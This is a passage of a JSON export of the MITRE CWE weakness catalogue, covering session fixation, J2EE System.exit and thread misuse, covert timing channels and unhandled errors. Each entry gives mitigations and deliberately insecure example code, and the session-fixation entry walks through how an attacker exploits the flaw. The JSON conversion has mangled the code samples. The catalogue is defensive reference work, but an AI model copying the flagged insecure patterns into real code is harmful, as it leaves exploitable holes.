Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Guessed or Visible Temporary File","attr":{"@_Date":"2008-04-11"}},{"#text":"Creation of Temporary File in Directory with Insecure Permissions","attr":{"@_Date":"2009-05-27"}},{"#text":"Creation of Temporary File in Directory with Incorrect Permissions","attr":{"@_Date":"2020-02-24"}}]}},"382":{"attr":{"@_ID":"382","@_Name":"J2EE Bad Practices: Use of System.exit()","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A J2EE application uses System.exit(), which also shuts down its container.","Extended_Description":"It is never a good idea for a web application to attempt to shut down the application container. Access to a function that can shut down the application is an avenue for Denial of Service (DoS) attacks.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"705","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"A call to System.exit() is probably part of leftover debug code or code imported from a non-J2EE application."}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"The shutdown function should be a privileged function available only to a properly authorized administrative user"},{"Phase":"Implementation","Description":"Web applications should not call methods that cause the virtual machine to exit, such as System.exit()"},{"Phase":"Implementation","Description":"Web applications should also not throw any Throwables to the application server as this may adversely affect the container."},{"Phase":"Implementation","Description":"Non-web applications may have a main() method that contains a System.exit(), but generally should not call System.exit() from other locations in the code"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Included in the doPost() method defined below is a call to System.exit() in the event of a specific exception.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"#text":"try {} catch (ApplicationSpecificException ase) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"logger.error(\\"Caught: \\" + ase.toString());System.exit(1);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Bad Practices: System.exit()"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"ERR09-J","Entry_Name":"Do not allow untrusted code to terminate the JVM"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Modes_of_Introduction, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"J2EE Bad Practices: System.exit()","attr":{"@_Date":"2008-04-11"}}}},"383":{"attr":{"@_ID":"383","@_Name":"J2EE Bad Practices: Direct Use of Threads","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Thread management in a Web application is forbidden in some circumstances and is always highly error prone.","Extended_Description":"Thread management in a web application is forbidden by the J2EE standard in some circumstances and is always highly error prone. Managing threads is difficult and is likely to interfere in unpredictable ways with the behavior of the application container. Even without interfering with the container, thread management usually leads to bugs that are hard to detect and diagnose like deadlock, race conditions, and other synchronization errors.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"695","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Quality Degradation"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"For EJB, use framework approaches for parallel execution, instead of using threads."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following example, a new Thread object is created and invoked directly from within the body of a doGet() method in a Java servlet.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...Runnable r = new Runnable() {};new Thread(r).start();","xhtml:br":["","","","","","",""],"xhtml:i":["// Perform servlet tasks.","// Create a new thread to handle background processing."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public void run() {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// Process and store request statistics."}}}}}}}}}},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"J2EE Bad Practices: Threads"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":[{"#text":"J2EE Bad Practices: Threads","attr":{"@_Date":"2008-01-30"}},{"#text":"J2EE Bad Practices: Use of Threads","attr":{"@_Date":"2008-04-11"}}]}},"384":{"attr":{"@_ID":"384","@_Name":"Session Fixation","@_Abstraction":"Compound","@_Structure":"Composite","@_Status":"Incomplete"},"Description":"Authenticating a user, or otherwise establishing a new user session, without invalidating any existing session identifier gives an attacker the opportunity to steal authenticated sessions.","Extended_Description":{"xhtml:p":"Such a scenario is commonly observed when:","xhtml:ol":{"xhtml:li":["A web application authenticates a user without first invalidating the existing session, thereby continuing to use the session already associated with the user.","An attacker is able to force a known session identifier on a user so that, once the user authenticates, the attacker has access to the authenticated session.","The application or container uses predictable session identifiers. In the generic exploit of session fixation vulnerabilities, an attacker creates a new session on a web application and records the associated session identifier. The attacker then causes the victim to associate, and possibly authenticate, against the server using that session identifier, giving the attacker access to the user\'s account through the active session."]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"610","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"346","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"472","@_View_ID":"1000"}},{"attr":{"@_Nature":"Requires","@_CWE_ID":"441","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Invalidate any existing session identifiers prior to authorizing a new user session."},{"Phase":"Architecture and Design","Description":"For platforms such as ASP that do not generate new values for sessionid cookies, utilize a secondary cookie. In this approach, set a secondary cookie on the user\'s browser to a random value and set a session variable to the same value. If the session variable and the cookie value ever don\'t match, invalidate the session, and force the user to log on again."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example shows a snippet of code from a J2EE web application where the application authenticates users with LoginContext.login() without first calling HttpSession.invalidate().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private void auth(LoginContext lc, HttpSession session) throws LoginException {}","xhtml:div":{"#text":"...lc.login();...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":["In order to exploit the code above, an attacker could first create a session (perhaps by logging into the application) from a public terminal, record the session identifier assigned by the application, and reset the browser to the login page. Next, a victim sits down at the same public terminal, notices the browser open to the login page of the site, and enters credentials to authenticate against the application. The code responsible for authenticating the victim continues to use the pre-existing session identifier, now the attacker simply uses the session identifier recorded earlier to access the victim\'s active session, providing nearly unrestricted access to the victim\'s account for the lifetime of the session. Even given a vulnerable application, the success of the specific attack described here is dependent on several factors working in the favor of the attacker: access to an unmonitored public terminal, the ability to keep the compromised session active and a victim interested in logging into the vulnerable application on the public terminal.","In most circumstances, the first two challenges are surmountable given a sufficient investment of time. Finding a victim who is both using a public terminal and interested in logging into the vulnerable application is possible as well, so long as the site is reasonably popular. The less well known the site is, the lower the odds of an interested victim using the public terminal and the lower the chance of success for the attack vector described above. The biggest challenge an attacker faces in exploiting session fixation vulnerabilities is inducing victims to authenticate against the vulnerable application using a session identifier known to the attacker.","In the example above, the attacker did this through a direct method that is not subtle and does not scale suitably for attacks involving less well-known web sites. However, do not be lulled into complacency; attackers have many tools in their belts that help bypass the limitations of this attack vector. The most common technique employed by attackers involves taking advantage of cross-site scripting or HTTP response splitting vulnerabilities in the target site [12]. By tricking the victim into submitting a malicious request to a vulnerable application that reflects JavaScript or other code back to the victim\'s browser, an attacker can create a cookie that will cause the victim to reuse a session identifier controlled by the attacker. It is worth noting that cookies are often tied to the top level domain associated with a given URL. If multiple applications reside on the same top level domain, such as bank.example.com and recipes.example.com, a vulnerability in one application can allow an attacker to set a cookie with a fixed session identifier that will be used in all interactions with any application on the domain example.com [29]."]},{"Intro_Text":"The following example shows a snippet of code from a J2EE web application where the application authenticates users with a direct post to the &lt;code&gt;j_security_check&lt;/code&gt;, which typically does not invalidate the existing session before processing the login request.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"HTML"},"xhtml:div":{"#text":"&lt;form method=\\"POST\\" action=\\"j_security_check\\"&gt;&lt;/form&gt;","xhtml:div":{"#text":"&lt;input type=\\"text\\" name=\\"j_username\\"&gt;&lt;input type=\\"text\\" name=\\"j_password\\"&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Session Fixation"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A3","Entry_Name":"Broken Authentication and Session Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":37,"Entry_Name":"Session Fixation"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"196"}},{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"31"}},{"attr":{"@_CAPEC_ID":"39"}},{"attr":{"@_CAPEC_ID":"59"}},{"attr":{"@_CAPEC_ID":"60"}},{"attr":{"@_CAPEC_ID":"61"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"#text":"Other attack vectors include DNS poisoning and related network based attacks where an attacker causes the user to visit a malicious site by redirecting a request for a valid site. Network based attacks typically involve a physical presence on the victim\'s network or control of a compromised machine on the network, which makes them harder to exploit remotely, but their significance should not be overlooked. Less secure session management mechanisms, such as the default implementation in Apache Tomcat, allow session identifiers normally expected in a cookie to be specified on the URL as well, which enables an attacker to cause a victim to use a fixed session identifier simply by emailing a malicious URL.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Description"}]}},"385":{"attr":{"@_ID":"385","@_Name":"Covert Timing Channel","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Covert timing channels convey information by modulating some aspect of system behavior over time, so that the program receiving the information can observe system behavior and infer protected information.","Extended_Description":{"xhtml:p":["In some instances, knowing when data is transmitted between parties can provide a malicious user with privileged information. Also, externally monitoring the timing of operations can potentially reveal sensitive data. For example, a cryptographic operation can expose its internal state if the time it takes to perform the operation varies, based on the state.","Covert channels are frequently classified as either storage or timing channels. Some examples of covert timing channels are the system\'s paging rate, the time a certain transaction requires to execute, and the time it takes to gain access to a shared bus."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"514","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Other"],"Impact":["Read Application Data","Other"],"Note":"Information exposure."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Whenever possible, specify implementation strategies that do not introduce time variances in operations."},{"Phase":"Implementation","Description":"Often one can artificially manipulate the time which operations take or -- when operations occur -- can remove information from the attacker."},{"Phase":"Implementation","Description":"It is reasonable to add artificial or random delays so that the amount of CPU time consumed is independent of the action being taken by the application."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In this example, the attacker observes how long an authentication takes when the user types in the correct password.","Body_Text":["When the attacker tries their own values, they can first try strings of various length. When they find a string of the right length, the computation will take a bit longer, because the for loop will run at least once. Additionally, with this code, the attacker can possibly learn one character of the password at a time, because when they guess the first character right, the computation will take longer than a wrong guesses. Such an attack can break even the most sophisticated password with a few hundred guesses.","Note that, in this example, the actual password must be handled in constant time, as far as the attacker is concerned, even if the actual password is of an unusual length. This is one reason why it is good to use an algorithm that, among other things, stores a seeded cryptographic one-way hash of the password, then compare the hashes, which will always be of the same length."],"Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"def validate_password(actual_pw, typed_pw):","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if len(actual_pw) &lt;&gt; len(typed_pw):for i in len(actual_pw):return 1","xhtml:div":[{"#text":"return 0","attr":{"@_style":"margin-left:10px;"}},{"#text":"if actual_pw[i] &lt;&gt; typed_pw[i]:","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"return 0","attr":{"@_style":"margin-left:10px;"}}}],"xhtml:br":["",""]}}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"Landwehr"},"Entry_Name":"Timing"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Covert Timing Channel"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"462"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"Landwehr","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"386":{"attr":{"@_ID":"386","@_Name":"Symbolic Name not Mapping to Correct Object","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A constant symbolic reference to an object is used, even though the reference can resolve to a different object over time.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"367","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"610","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"486","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"The attacker can gain access to otherwise unauthorized resources."},{"Scope":["Integrity","Confidentiality","Other"],"Impact":["Modify Application Data","Modify Files or Directories","Read Application Data","Read Files or Directories","Other"],"Note":"Race conditions such as this kind may be employed to gain read or write access to resources not normally readable or writable by the user in question."},{"Scope":["Integrity","Other"],"Impact":["Modify Application Data","Other"],"Note":"The resource in question, or other resources (through the corrupted one) may be changed in undesirable ways by a malicious user."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"If a file or other resource is written in this method, as opposed to a valid way, logging of the activity may not occur."},{"Scope":["Non-Repudiation","Integrity"],"Impact":"Modify Files or Directories","Note":"In some cases it may be possible to delete files that a malicious user might not otherwise have access to -- such as log files."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Symbolic name not mapping to correct object"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"390":{"attr":{"@_ID":"390","@_Name":"Detection of Error Condition Without Action","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software detects a specific error, but takes no actions to handle the error.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"401","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State","Alter Execution Logic"],"Note":"An attacker could utilize an ignored error condition to place the system in an unexpected state that could lead to the execution of unintended logic and could cause other unintended behavior."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Properly handle each exception. This is the recommended solution. Ensure that all exceptions are handled in such a way that you can be sure of the state of your system at any given moment."},{"Phase":"Implementation","Description":"If a function returns an error, it is important to either fix the problem and try again, alert the user that an error has happened and let the program continue, or alert the user and close and cleanup the program."},{"Phase":"Testing","Description":"Subject the software to extensive testing to discover some of the possible instances of where/how errors or return values are not handled. Consider testing techniques such as ad hoc, equivalence partitioning, robustness and fault tolerance, mutation, and fuzzing."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example attempts to allocate memory for a character. After the call to malloc, an if statement is used to check whether the malloc function failed.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"foo=malloc(sizeof(char)); //the next line checks to see if malloc failedif (foo==NULL) {}","xhtml:br":"","xhtml:div":{"#text":"//We do nothing so we just ignore the error.","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"foo=malloc(sizeof(char)); //the next line checks to see if malloc failedif (foo==NULL) {}","xhtml:br":"","xhtml:div":{"#text":"printf(\\"Malloc failed to allocate memory resources\\");return -1;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}],"Body_Text":["The conditional successfully detects a NULL return value from malloc indicating a failure, however it does not do anything to handle the problem. Unhandled errors may have unexpected results and may cause the program to crash or terminate.","Instead, the if block should contain statements that either attempt to fix the problem or notify the user that an error has occurred and continue processing or perform some cleanup and gracefully terminate the program. The following example notifies the user that the malloc function did not allocate the required memory resources and returns an error code."]},{"Intro_Text":"In the following C++ example the method readFile() will read the file whose name is provided in the input parameter and will return the contents of the file in char string. The method calls open() and read() may result in errors if the file does not exist or does not contain any data to read. These errors will be thrown when the is_open() method and good() method indicate errors opening or reading the file. However, these errors are not handled within the catch statement. Catch statements that do not perform any processing will have unexpected results. In this case an empty char string will be returned, and the file will not be properly closed.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"char* readfile (char *filename) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {}catch (...) {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// open input fileifstream infile;infile.open(filename);if (!infile.is_open()) {}// get length of fileinfile.seekg (0, ios::end);int length = infile.tellg();infile.seekg (0, ios::beg);// allocate memorychar *buffer = new char [length];// read data from fileinfile.read (buffer,length);if (!infile.good()) {}infile.close();return buffer;","xhtml:br":["","","","","","","","","","","","","","","","","","","","",""],"xhtml:div":[{"#text":"throw \\"Unable to open file \\" + filename;","attr":{"@_style":"margin-left:10px;"}},{"#text":"throw \\"Unable to read from file \\" + filename;","attr":{"@_style":"margin-left:10px;"}}]}},{"#text":"/* bug: insert code to handle this later */","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}}},{"attr":{"@_Nature":"good","@_Language":"C++"},"xhtml:div":{"#text":"char* readFile (char *filename) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"try {}catch (char *str) {}catch (...) {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// open input fileifstream infile;infile.open(filename);if (!infile.is_open()) {}// get length of fileinfile.seekg (0, ios::end);int length = infile.tellg();infile.seekg (0, ios::beg);// allocate memorychar *buffer = new char [length];// read data from fileinfile.read (buffer,length);if (!infile.good()) {}infile.close();return 